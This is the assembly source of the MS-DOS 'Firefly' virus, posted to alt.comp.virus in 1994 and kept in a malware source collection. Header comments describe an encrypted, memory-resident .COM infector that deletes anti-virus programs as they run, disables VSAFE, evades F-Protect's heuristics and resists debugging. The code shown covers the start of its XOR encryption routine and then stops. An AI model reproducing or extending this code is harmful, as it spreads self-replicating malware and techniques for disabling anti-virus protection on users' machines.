MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.firefly.asm

From netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE Tue Nov 29 09:56:01 1994
Xref: netcom.com alt.comp.virus:491
Path: netcom.com!ix.netcom.com!howland.reston.ans.net!cs.utexas.edu!geraldo.cc.utexas.edu!axpvms.cc.utexas.edu!HALFLIFE
From: halflife@axpvms.cc.utexas.edu
Newsgroups: alt.comp.virus
Subject: Firefly virus
Date: 28 Nov 1994 08:51:37 GMT
Organization: University of Texas @ Austin
Lines: 61
Message-ID: <3bc5mq$p63@geraldo.cc.utexas.edu>
Reply-To: halflife@axpvms.cc.utexas.edu
NNTP-Posting-Host: axpvms.cc.utexas.edu

;FIREFLY virus, by Nikademus.                
;
;Firefly is an encrypted, memory resident virus which infects
;.COMfiles on load.  It incorporates code from Proto-T, 
;LokJaw and YB-X viruses and, when in memory, attacks a large selection
;of anti-virus programs as they are executed.  Anti-virus programs
;identified by Firefly's execute/load handler are deleted.
;Firefly incorporates simple code from previous issues of the newsletter
;designed to de-install generic VSAFE resident virus activity
;filters designed for Microsoft by Central Point Software.  It
;contains instructions - specifically a segment of pseudo-nested 
;loops - which spoof F-Protect's expert system generic virus
;identification feature.
;
;FIREFLY also includes a visual marker tied to the system timer
;tick interrupt (1Ch) which slowly cycles the NumLock, CapsLock
;and ScrollLock LEDs on the keyboard.  This produces a noticeable
;twinkling effect when the virus is active on a machine.
;
;Anti-anti-virus measures used by Firefly vary in effectiveness
;dependent upon how a user employs software.  For example, while
;Firefly is designed to delete the Victor Charlie anti-virus
;shell, VC.EXE, a user who employs the software packages utilities
;for generic virus detection singly, will not be interfered with
;by the virus. Your results may vary, but the virus does effectively
;delete anti-virus programs while in memory unless steps are taken
;beforehand to avoid this.
;
;Firefly incorporates minor code armoring techniques designed to thwart
;trivial debugging.
 
                
                
                .radix 16
     code       segment
                model  small
                assume cs:code, ds:code, es:code
 
                org 100h
 
len             equ offset last - start
vir_len         equ len / 16d                    ; 16 bytes per paragraph 
encryptlength   equ (last - begin)/4+1
 
 
 
start:
                mov bx, offset begin        ; The Encryption Head
                mov cx, encryptlength       ;
encryption_loop:                            ;
                db      81h                 ; XOR WORD PTR [BX], ????h
                db      37h                 ;
encryption_value_1:                         ;
                dw      0000h               ;
                                            ;
                db      81h                 ; XOR WORD PTR [BX+2], ????h
                db      77h                 ;
                db      02h                 ; 2 different random words
encryption_value_2:                         ; give 32-bit encryption
                dw      0000h               ;
                add     bx, 4               ;